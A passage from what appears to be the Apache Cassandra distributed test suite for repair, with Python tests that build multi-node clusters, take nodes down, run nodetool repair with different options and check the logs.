node1_1, node2_1, node1_2, node2_2 = cluster.nodelist()
node1_1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=4)'])
node1_1.nodetool("repair keyspace1 standard1")
for node in cluster.nodelist():
assert "Starting anticompaction"
def test_simple_sequential_repair(self):
"""
Calls simple repair test with a sequential repair
"""
self._simple_repair(sequential=True)
def test_simple_parallel_repair(self):
"""
Calls simple repair test with a parallel repair
"""
self._simple_repair(sequential=False)
def test_empty_vs_gcable_sequential_repair(self):
"""
Calls empty_vs_gcable repair test with a sequential repair
"""
self._empty_vs_gcable_no_repair(sequential=True)
def test_empty_vs_gcable_parallel_repair(self):
"""
Calls empty_vs_gcable repair test with a parallel repair
"""
self._empty_vs_gcable_no_repair(sequential=False)
def test_range_tombstone_digest_sequential_repair(self):
"""
Calls range_tombstone_digest with a sequential repair
"""
self._range_tombstone_digest(sequential=True)
def test_range_tombstone_digest_parallel_repair(self):
"""
Calls range_tombstone_digest with a parallel repair
"""
self._range_tombstone_digest(sequential=False)
@since('2.1')
def test_shadowed_cell_digest_sequential_repair(self):
"""
Calls _cell_shadowed_by_range_tombstone with sequential repair
"""
self._cell_shadowed_by_range_tombstone(sequential=True)
@since('2.1')
def test_shadowed_cell_digest_parallel_repair(self):
"""
Calls _cell_shadowed_by_range_tombstone with parallel repair
"""
self._cell_shadowed_by_range_tombstone(sequential=False)
@since('3.0')
def test_shadowed_range_tombstone_digest_sequential_repair(self):
"""
Calls _range_tombstone_shadowed_by_range_tombstone with sequential repair
"""
self._range_tombstone_shadowed_by_range_tombstone(sequential=True)
@since('3.0')
def test_shadowed_range_tombstone_digest_parallel_repair(self):
"""
Calls _range_tombstone_shadowed_by_range_tombstone with parallel repair
"""
self._range_tombstone_shadowed_by_range_tombstone(sequential=False)
@pytest.mark.no_vnodes
def test_simple_repair_order_preserving(self):
"""
Calls simple repair test with OPP and sequential repair
@jira_ticket CASSANDRA-5220
"""
self._simple_repair(order_preserving_partitioner=True)
def _simple_repair(self, order_preserving_partitioner=False, sequential=True):
"""
* Configure a three node cluster to not use hinted handoff, and to use batch commitlog
* Launch the cluster
* Create a keyspace at RF 3 and table
* Insert one thousand rows at CL ALL
* Flush on node3 and shut it down
* Insert one row at CL TWO
* Restart node3
* Insert one thousand more rows at CL ALL
* Flush all nodes
* Check node3 only has 2000 keys
* Check node1 and node2 have 2001 keys
* Perform the repair type specified by the parent test
* Assert the appropriate messages are logged
* Assert node3 now has all data
@jira_ticket CASSANDRA-4373
"""
if order_preserving_partitioner:
self.cluster.set_partitioner('org.apache.cassandra.dht.ByteOrderedPartitioner')
self._populate_cluster()
self._repair_and_verify(sequential)
def _empty_vs_gcable_no_repair(self, sequential):
"""
Repairing empty partition and tombstoned partition older than gc grace
should be treated as the same and no repair is necessary.
@jira_ticket CASSANDRA-8979.
"""
cluster = self.cluster
cluster.populate(2)
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
# create keyspace with RF=2 to be able to be repaired
create_ks(session, 'ks', 2)
# we create two tables, one has low gc grace seconds so that the data
# can be dropped during test (but we don't actually drop them).
# the other has default gc.
# compaction is disabled not to purge data
query = """
CREATE TABLE cf1 (
key text,
c1 text,
c2 text,
PRIMARY KEY (key, c1)
)
WITH gc_grace_seconds=1
AND compaction = {'class': 'SizeTieredCompactionStrategy', 'enabled': 'false'};
"""
session.execute(query)
time.sleep(.5)
query = """
CREATE TABLE cf2 (
key text,
c1 text,
c2 text,
PRIMARY KEY (key, c1)
)
WITH compaction = {'class': 'SizeTieredCompactionStrategy', 'enabled': 'false'};
"""
session.execute(query)
time.sleep(.5)
# take down node2, so that only node1 has gc-able data
node2.stop(wait_other_notice=True)
for cf in ['cf1', 'cf2']:
# insert some data
for i in range(0, 10):
for j in range(0, 1000):
query = SimpleStatement("INSERT INTO {} (key, c1, c2) VALUES ('k{}', 'v{}', 'value')".format(cf, i, j), consistency_level=ConsistencyLevel.ONE)
session.execute(query)
node1.flush()
# delete those data, half with row tombstone, and the rest with cell range tombstones
for i in range(0, 5):
query = SimpleStatement("DELETE FROM {} WHERE key='k{}'".format(cf, i), consistency_level=ConsistencyLevel.ONE)
session.execute(query)
node1.flush()
for i in range(5, 10):
for j in range(0, 1000):
query = SimpleStatement("DELETE FROM {} WHERE key='k{}' AND c1='v{}'".format(cf, i, j), consistency_level=ConsistencyLevel.ONE)
session.execute(query)
node1.flush()
# sleep until gc grace seconds pass so that cf1 can be dropped
time.sleep(2)
# bring up node2 and repair
node2.start(wait_for_binary_proto=True)
node2.repair(_repair_options(self.cluster.version(), ks='ks', sequential=sequential))
# check no rows will be returned
for cf in ['cf1', 'cf2']:
for i in range(0, 10):
query = SimpleStatement("SELECT c1, c2 FROM {} WHERE key='k{}'".format(cf, i), consistency_level=ConsistencyLevel.ALL)
res = list(session.execute(query))
assert len([x for x in res if len(x) != 0]) == 0, res
# check log for no repair happened for gcable data
out_of_sync_logs = node2.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync for cf1".format(cluster.address_regex(), cluster.address_regex()))
assert len(out_of_sync_logs) == 0, "GC-able data does not need to be repaired with empty data: " + str([elt[0] for elt in out_of_sync_logs])
# check log for actual repair for non gcable data
out_of_sync_logs = node2.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync for cf2".format(cluster.address_regex(), cluster.address_regex()))
assert len(out_of_sync_logs) > 0, "Non GC-able data should be repaired"
def _range_tombstone_digest(self, sequential):
"""
multiple range tombstones for same partition and interval must not create a digest mismatch as long
as the most recent tombstone is present.
@jira_ticket cassandra-11349.
"""
def withsession(session, node1):
session.execute("delete from table1 where c1 = 'a' and c2 = 'b'")
node1.flush()
# recreate same tombstone (will be flushed by repair, so we end up with 2x on node1 and 1x on node2)
session.execute("delete from table1 where c1 = 'a' and c2 = 'b'")
self._repair_digest(sequential, withsession)
def _cell_shadowed_by_range_tombstone(self, sequential):
"""
Cells shadowed by range tombstones must not effect repairs (given tombstones are present on all nodes)
@jira_ticket CASSANDRA-11349.
"""
def withSession(session, node1):
session.execute("INSERT INTO table1 (c1, c2, c3, c4) VALUES ('a', 'b', 'c', 1)")
node1.flush()
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b'")
self._repair_digest(sequential, withSession)
def _range_tombstone_shadowed_by_range_tombstone(self, sequential):
"""
Range tombstones shadowed by other range tombstones must not effect repairs
@jira_ticket CASSANDRA-11349.
"""
def withSession(session, node1):
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b' AND c3 = 'c'")
node1.flush()
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b'")
node1.flush()
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b' AND c3 = 'd'")
node1.flush()
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b' AND c3 = 'a'")
self._repair_digest(sequential, withSession)
def _repair_digest(self, sequential, populate):
cluster = self.cluster
cluster.populate(2)
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
# create keyspace with RF=2 to be able to be repaired
create_ks(session, 'ks', 2)
query = """
CREATE TABLE IF NOT EXISTS table1 (
c1 text,
c2 text,
c3 text,
c4 float,
PRIMARY KEY (c1, c2, c3)
)
WITH compaction = {'class': 'SizeTieredCompactionStrategy', 'enabled': 'false'};
"""
session.execute(query)
populate(session, node1)
node2.repair(_repair_options(self.cluster.version(), ks='ks', sequential=sequential))
# check log for no repair happened for gcable data
out_of_sync_logs = node2.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync for table1".format(cluster.address_regex(), cluster.address_regex()))
assert len(out_of_sync_logs) == 0, "Digest mismatch for range tombstone: {}".format(str([elt[0] for elt in out_of_sync_logs]))
def test_local_dc_repair(self):
"""
* Set up a multi DC cluster
* Perform a -local repair on one DC
* Assert only nodes in that DC are repaired
"""
cluster = self._setup_multi_dc()
node1 = cluster.nodes["node1"]
node2 = cluster.nodes["node2"]
logger.debug("starting repair...")
opts = ["-local"]
opts += _repair_options(self.cluster.version(), ks="ks")
node1.repair(opts)
# Verify that only nodes in dc1 are involved in repair
out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex()))
assert len(out_of_sync_logs) == 1, "Lines matching: {}".format(len(out_of_sync_logs))
line, m = out_of_sync_logs[0]
num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)}
assert int(num_out_of_sync_ranges) == 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, num_out_of_sync_ranges)
valid_out_of_sync_pairs = {node1.address(), node2.address()}
assert out_of_sync_nodes == valid_out_of_sync_pairs, "Unrelated node found in local repair: {}, expected {}".format(out_of_sync_nodes, valid_out_of_sync_pairs)
# Check node2 now has the key
self.check_rows_on_node(node2, 2001, found=[1000], restart=False)
def test_dc_repair(self):
"""
* Set up a multi DC cluster
* Perform a -dc repair on two dc's
* Assert only nodes on those dcs were repaired
"""
cluster = self._setup_multi_dc()
node1 = cluster.nodes["node1"]
node2 = cluster.nodes["node2"]
node3 = cluster.nodes["node3"]
logger.debug("starting repair...")
opts = ["-dc", "dc1", "-dc", "dc2"]
opts += _repair_options(self.cluster.version(), ks="ks")
node1.repair(opts)
# Verify that only nodes in dc1 and dc2 are involved in repair
out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex()))
assert len(out_of_sync_logs) == 2, "Lines matching: " + str([elt[0] for elt in out_of_sync_logs])
valid_out_of_sync_pairs = [{node1.address(), node2.address()},
{node2.address(), node3.address()}]
for line, m in out_of_sync_logs:
num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)}
assert int(num_out_of_sync_ranges) == 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, num_out_of_sync_ranges)
assert out_of_sync_nodes, valid_out_of_sync_pairs in str(out_of_sync_nodes)
# Check node2 now has the key
self.check_rows_on_node(node2, 2001, found=[1000], restart=False)
def test_dc_parallel_repair(self):
"""
* Set up a multi DC cluster
* Perform a -dc repair on two dc's, with -dcpar
* Assert only nodes on those dcs were repaired
"""
cluster = self._setup_multi_dc()
node1 = cluster.nodes["node1"]
node2 = cluster.nodes["node2"]
node3 = cluster.nodes["node3"]
logger.debug("starting repair...")
opts = ["-dc", "dc1", "-dc", "dc2", "-dcpar"]
opts += _repair_options(self.cluster.version(), ks="ks", sequential=False)
node1.repair(opts)
# Verify that only nodes in dc1 and dc2 are involved in repair
out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex()))
assert len(out_of_sync_logs) == 2, "Lines matching: " + str([elt[0] for elt in out_of_sync_logs])
valid_out_of_sync_pairs = [{node1.address(), node2.address()},
{node2.address(), node3.address()}]
for line, m in out_of_sync_logs:
num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)}
assert int(num_out_of_sync_ranges) == 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, num_out_of_sync_ranges)
assert out_of_sync_nodes, valid_out_of_sync_pairs in str(out_of_sync_nodes)
# Check node2 now has the key
self.check_rows_on_node(node2, 2001, found=[1000], restart=False)
# Check the repair was a dc parallel repair
if self.cluster.version() >= '2.2':
assert len(node1.grep_log('parallelism: dc_parallel')) == 1, str(node1.grep_log('parallelism'))
else:
assert len(node1.grep_log('parallelism=PARALLEL')) == 1, str(node1.grep_log('parallelism'))
def _setup_multi_dc(self):
"""
Sets up 3 DCs (2 nodes in 'dc1', and one each in 'dc2' and 'dc3').
After set up, node2 in dc1 lacks some data and needs to be repaired.
"""
cluster = self.cluster
# Disable hinted handoff and set batch commit log so this doesn't
# interfer with the test (this must be after the populate)
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
logger.debug("Starting cluster..")
# populate 2 nodes in dc1, and one node each in dc2 and dc3
cluster.populate([2, 1, 1]).start()
node1, node2, node3, node4 = cluster.nodelist()
session = self.patient_cql_connection(node1)
session.execute("CREATE KEYSPACE ks WITH replication = {'class': 'NetworkTopologyStrategy', 'dc1': 2, 'dc2': 1, 'dc3':1}")
session.execute("USE ks")
if cluster.version() < '4.0':
create_cf(session, 'cf', read_repair=0.0, columns={'c1': 'text', 'c2': 'text'})
else:
create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'})
# Insert 1000 keys, kill node 2, insert 1 key, restart node 2, insert 1000 more keys
logger.debug("Inserting data...")
insert_c1c2(session, n=1000, consistency=ConsistencyLevel.ALL, ks='ks')
node2.flush()
node2.stop(wait_other_notice=True)
insert_c1c2(session, keys=(1000, ), consistency=ConsistencyLevel.THREE, ks='ks')
node2.start(wait_for_binary_proto=True)
node1.watch_log_for_alive(node2)
insert_c1c2(session, keys=list(range(1001, 2001)), consistency=ConsistencyLevel.ALL, ks='ks')
cluster.flush()
# Verify that only node2 has only 2000 keys and others have 2001 keys
logger.debug("Checking data...")
self.check_rows_on_node(node2, 2000, missings=[1000])
for node in [node1, node3, node4]:
self.check_rows_on_node(node, 2001, found=[1000])
return cluster
@since('2.2')
def parallel_table_repair_noleak(self):
"""
@jira_ticket CASSANDRA-11215
Tests that multiple parallel repairs on the same table isn't
causing reference leaks.
"""
self.fixture_dtest_setup.ignore_log_patterns = [
"Cannot start multiple repair sessions over the same sstables", # The message we are expecting
"Validation failed in", # Expecting validation to fail
"RMI Runtime", # JMX Repair failures
"Session completed with the following error", # The nodetool repair error
"ValidationExecutor", # Errors by the validation executor
"RepairJobTask" # Errors by the repair job task
]
cluster = self.cluster
logger.debug("Starting cluster..")
cluster.populate([3]).start()
node1, node2, node3 = cluster.nodelist()
node1.stress(stress_options=['write', 'n=10k', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)', '-rate', 'threads=50'])
# Start multiple repairs in parallel
threads = []
for i in range(3):
t = threading.Thread(target=node1.nodetool, args=("repair keyspace1 standard1",))
threads.append(t)
t.start()
# Wait for the repairs to finish
for t in threads:
t.join()
found_message = False
# All nodes should reject multiple repairs and have no reference leaks
for node in cluster.nodelist():
if len(node.grep_log("Cannot start multiple repair sessions over the same sstables")) > 0:
found_message = True
break
assert found_message
@pytest.mark.no_vnodes
def test_token_range_repair(self):
"""
Test repair using the -st and -et options
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on a range that only belongs to node1
* Verify that nodes 1 and 2, and only nodes 1+2, are repaired
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
logger.debug("Starting cluster..")
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
self._parameterized_range_repair(repair_opts=['-st', str(node3.initial_token), '-et', str(node1.initial_token)])
@pytest.mark.no_vnodes
def test_token_range_repair_with_cf(self):
"""
@jira_ticket CASSANDRA-11866
Test repair using the -st and -et, and -cf options
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on a range that only belongs to node1 on the wrong cf
* Verify that the data did not get repaired
* Issue a repair on a range that belongs to the right cf
* Verify that the data was repaired
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
logger.debug("Starting cluster..")
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
# Insert data, kill node 2, insert more data, restart node 2, insert another set of data
logger.debug("Inserting data...")
node1.stress(['write', 'n=1k', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30'])
node2.flush()
node2.stop(wait_other_notice=True)
node1.stress(['write', 'n=1K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=20..40K'])
node2.start(wait_for_binary_proto=True)
node1.stress(['write', 'n=1K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=40..60K'])
cluster.flush()
# Repair only the range node 1 owns on the wrong CF, assert everything is still broke
opts = ['-st', str(node3.initial_token), '-et', str(node1.initial_token), ]
opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='counter1', sequential=False)
node1.repair(opts)
assert len(node1.grep_log('are consistent for standard1')) == 0, "Nodes 1 and 2 should not be consistent."
assert len(node3.grep_log('Repair command')) == 0, "Node 3 should not have been involved in the repair."
out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex()))
assert len(out_of_sync_logs) == 0, "We repaired the wrong CF == so things should still be broke"
# Repair only the range node 1 owns on the right CF, assert everything is fixed
opts = ['-st', str(node3.initial_token), '-et', str(node1.initial_token), ]
opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False)
node1.repair(opts)
assert len(node1.grep_log('are consistent for standard1')) == 0, "Nodes 1 and 2 should not be consistent."
assert len(node3.grep_log('Repair command')) == 0, "Node 3 should not have been involved in the repair."
out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex()))
_, matches = out_of_sync_logs[0]
out_of_sync_nodes = {matches.group(1), matches.group(2)}
valid_out_of_sync_pairs = [{node1.address(), node2.address()}]
assert out_of_sync_nodes, valid_out_of_sync_pairs in str(out_of_sync_nodes)
@pytest.mark.no_vnodes
def test_partitioner_range_repair(self):
"""
Test repair using the -pr option
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on a range that only belongs to node1
* Verify that nodes 1 and 2, and only nodes 1+2, are repaired
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
logger.debug("Starting cluster..")
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
self._parameterized_range_repair(repair_opts=['-pr'])
@since('3.10')
@pytest.mark.no_vnodes
def test_pull_repair(self):
"""
Test repair using the --pull option
@jira_ticket CASSANDRA-9876
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a pull repair on a range that only belongs to node1
* Verify that nodes 1 and 2, and only nodes 1+2, are repaired
* Verify that node1 only received data
* Verify that node2 only sent data
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
logger.debug("Starting cluster..")
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
node1_address = node1.network_interfaces['binary'][0]
node2_address = node2.network_interfaces['binary'][0]
self._parameterized_range_repair(repair_opts=['--pull', '--in-hosts', node1_address + ',' + node2_address, '-st', str(node3.initial_token), '-et', str(node1.initial_token)])
# Node 1 should only receive files (as we ran a pull repair on node1)
assert len(node1.grep_log("Receiving [1-9][0-9]* files")) > 0
assert len(node1.grep_log("sending [1-9][0-9]* files")) == 0
assert len(node1.grep_log("sending 0 files")) > 0
# Node 2 should only send files (as we ran a pull repair on node1)
assert len(node2.grep_log("Receiving [1-9][0-9]* files")) == 0
assert len(node2.grep_log("Receiving 0 files")) > 0
assert len(node2.grep_log("sending [1-9][0-9]* files")) > 0
@since('4.0')
def test_non_replicated_ks_repair(self):
cluster = self.cluster
cluster.populate([2, 2]).start(wait_for_binary_proto=True)
self.fixture_dtest_setup.ignore_log_patterns.extend(["no neighbors to repair with",
"keyspace is skipped since repair was called with --skip-empty"])
_, _, node, _ = cluster.nodelist()
session = self.patient_cql_connection(node)
create_ks(session, "repair1", {'dc1': 2, 'dc2': 0})
create_ks(session, "repair2", {'dc1': 2, 'dc2': 2})
session.execute("create table repair1.t1 (id int primary key, i int)")
session.cluster.control_connection.wait_for_schema_agreement(wait_time=120)
session.execute("create table repair2.t2 (id int primary key, i int)")
session.cluster.control_connection.wait_for_schema_agreement(wait_time=120)
session.execute("insert into repair1.t1 (id, i) values (1, 1)")
session.execute("insert into repair2.t2 (id, i) values (2, 2)")
node.nodetool("repair --ignore-unreplicated-keyspaces -st 0 -et 1")
assert len(node.grep_log("t2 is fully synced")) > 0
assert len(node.grep_log("in repair1 - unreplicated keyspace is ignored since repair was called with --ignore-unreplicated-keyspaces")) > 0
try:
self.fixture_dtest_setup.ignore_log_patterns.append("Nothing to repair for .+ in repair1")
node.nodetool("repair -st 0 -et 1")
assert False, "repair should fail"
except ToolError:
logger.debug("got expected exception during repair")
@since('4.0')
@pytest.mark.no_vnodes
def test_multiple_ranges_repair(self):
cluster = self.cluster
cluster.populate([3])
node1, node2, node3 = cluster.nodelist()
cluster.start(wait_for_binary_proto=True)
self.fixture_dtest_setup.ignore_log_patterns.extend(["Nothing to repair for"])
session = self.patient_cql_connection(node1)
create_ks(session, "repair1", {'dc1': 2})
session.execute("create table repair1.t1 (id int primary key, i int)")
session.cluster.control_connection.wait_for_schema_agreement(wait_time=120)
session.execute("insert into repair1.t1 (id, i) values (1, 1)")
with JolokiaAgent(node1) as jmx:
repair_mbean = make_mbean('db', 'StorageService')
# 0,1 is replicated, -3074457345618258606:-3074457345618258605 is not:
jmx.execute_method(repair_mbean, 'repairAsync(java.lang.String,java.util.Map)',
["repair1", {"ranges": "0:1,-3074457345618258606:-3074457345618258605"}])
node1.watch_log_for("Nothing to repair for \(-3074457345618258606,-3074457345618258605\] in repair1 - aborting")
assert len(node1.grep_log("fully synced")) == 0
jmx.execute_method(repair_mbean, 'repairAsync(java.lang.String,java.util.Map)',
["repair1", {"ranges": "0:1,-3074457345618258606:-3074457345618258605",
"ignoreUnreplicatedKeyspaces": "true"}])
node1.watch_log_for("Found no neighbors for range \(-3074457345618258606,-3074457345618258605\] for repair1 - ignoring since repairing with --ignore-unreplicated-keyspaces")
node1.watch_log_for("t1 is fully synced")
def _parameterized_range_repair(self, repair_opts):
"""
@param repair_opts A list of strings which represent cli args to nodetool repair
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on a range that only belongs to node1, using repair_opts
* Verify that nodes 1 and 2, and only nodes 1+2, are repaired
"""
cluster = self.cluster
node1, node2, node3 = cluster.nodelist()
# Insert data, kill node 2, insert more data, restart node 2, insert another set of data
logger.debug("Inserting data...")
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30'])
node2.flush()
node2.stop(wait_other_notice=True)
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=20..40K'])
node2.start(wait_for_binary_proto=True)
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=40..60K'])
cluster.flush()
# Repair only the range node 1 owns
opts = repair_opts
opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False)
node1.repair(opts)
assert len(node1.grep_log('are consistent for standard1')) == 0, "Nodes 1 and 2 should not be consistent."
assert len(node3.grep_log('Repair command')) == 0, "Node 3 should not have been involved in the repair."
out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex()))
_, matches = out_of_sync_logs[0]
out_of_sync_nodes = {matches.group(1), matches.group(2)}
valid_out_of_sync_pairs = [{node1.address(), node2.address()}]
assert out_of_sync_nodes, valid_out_of_sync_pairs in str(out_of_sync_nodes)
@since('2.2')
def test_trace_repair(self):
"""
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on to node1, setting job threads to 2 and with tracing enabled
* Check the trace data was written, and that the right job thread count was used
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
logger.debug("Starting cluster..")
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
logger.debug("Inserting data...")
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30'])
node2.flush()
node2.stop(wait_other_notice=True)
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=20..40K'])
node2.start(wait_for_binary_proto=True)
cluster.flush()
job_thread_count = '2'
opts = ['-tr', '-j', job_thread_count]
opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False)
node1.repair(opts)
time.sleep(5) # Give the trace table some time to populate
session = self.patient_cql_connection(node1)
rows = list(session.execute("SELECT activity FROM system_traces.events"))
# This check assumes that the only (or at least first) thing to write to `system_traces.events.activity` is
# the repair task triggered in the test.
assert 'job threads: {}'.format(job_thread_count) in rows[0][0], \
'Expected {} job threads in repair options. Instead we saw {}'.format(job_thread_count, rows[0][0])
@since('2.2')
def test_thread_count_repair(self):
"""
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on to node1, setting job threads
* Check the right job thread count was used
* Repeat steps 2 through 5 with all job count options
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
logger.debug("Starting cluster..")
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
# Valid job thread counts: 1, 2, 3, and 4
for job_thread_count in range(1, 5):
logger.debug("Inserting data...")
node1.stress(['write', 'n=2K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate',
'threads=30', '-pop', 'seq={}..{}K'.format(2 * (job_thread_count - 1), 2 * job_thread_count)])
node2.flush()
node2.stop(wait_other_notice=True)
node1.stress(['write', 'n=2K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate',
'threads=30', '-pop', 'seq={}..{}K'.format(2 * (job_thread_count), 2 * (job_thread_count + 1))])
node2.start(wait_for_binary_proto=True)
cluster.flush()
session = self.patient_cql_connection(node1)
session.execute("TRUNCATE system_traces.events")
opts = ['-tr', '-j', str(job_thread_count)]
opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False)
node1.repair(opts)
time.sleep(5) # Give the trace table some time to populate
rows = list(session.execute("SELECT activity FROM system_traces.events"))
# This check assumes that the only (or at least first) thing to write to `system_traces.events.activity` is
# the repair task triggered in the test.
assert 'job threads: {}'.format(job_thread_count) in rows[0][0], \
'Expected {} job threads in repair options. Instead we saw {}'.format(job_thread_count, rows[0][0])
@pytest.mark.no_vnodes
def test_multiple_concurrent_repairs(self):
"""
@jira_ticket CASSANDRA-11451
Make sure we can run sub range repairs in parallel - and verify that we actually do repair
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
node2.stop(wait_other_notice=True)
node1.stress(['write', 'n=1M', 'no-warmup', '-schema', 'replication(factor=3)', '-rate', 'threads=30'])
node2.start(wait_for_binary_proto=True)
t1 = threading.Thread(target=node1.nodetool, args=('repair keyspace1 standard1 -full -st {} -et {}'.format(str(node3.initial_token), str(node1.initial_token)),))
t2 = threading.Thread(target=node2.nodetool, args=('repair keyspace1 standard1 -full -st {} -et {}'.format(str(node1.initial_token), str(node2.initial_token)),))
t3 = threading.Thread(target=node3.nodetool, args=('repair keyspace1 standard1 -full -st {} -et {}'.format(str(node2.initial_token), str(node3.initial_token)),))
t1.start()
t2.start()
t3.start()
t1.join()
t2.join()
t3.join()
node1.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
_, _, rc = node2.stress(['read', 'n=1M', 'no-warmup', '-rate', 'threads=30'], whitelist=True)
assert rc == 0
@since('4.0')
def test_wide_row_repair(self):
"""
@jira_ticket CASSANDRA-13899
Make sure compressed vs uncompressed blocks are handled correctly when stream decompressing
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
node2.stop(wait_other_notice=True)
profile_path = os.path.join(os.getcwd(), 'stress_profiles/repair_wide_rows.yaml')
logger.info(("yaml = " + profile_path))
node1.stress(['user', 'profile=' + profile_path, 'n=50', 'ops(insert=1)', 'no-warmup', '-rate', 'threads=8',
'-insert', 'visits=FIXED(100K)', 'revisit=FIXED(100K)'])
node2.start(wait_for_binary_proto=True)
node2.repair()
@since('2.1', max_version='4')
def test_dead_coordinator(self):
"""
@jira_ticket CASSANDRA-11824
Make sure parent repair session is cleared out if the repair coordinator dies
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
node1.stress(['write', 'n=100k', '-schema', 'replication(factor=3)', '-rate', 'threads=30'])
def run_repair():
try:
if cluster.version() >= "2.2":
node1.repair()
else:
node1.nodetool('repair keyspace1 standard1 -inc -par')
except ToolError:
logger.debug("got expected exception during repair, ignoring")
t1 = threading.Thread(target=run_repair)
t1.start()
if cluster.version() > "2.2":
node2.watch_log_for('Validating ValidationRequest', filename='debug.log')
else:
node1.watch_log_for('requesting merkle trees', filename='system.log')
time.sleep(2)
logger.debug("stopping node1")
node1.stop(gently=False, wait_other_notice=True)
t1.join()
logger.debug("starting node1 - first repair should have failed")
node1.start(wait_for_binary_proto=True)
logger.debug("running second repair")
if cluster.version() >= "2.2":
node1.repair()
else:
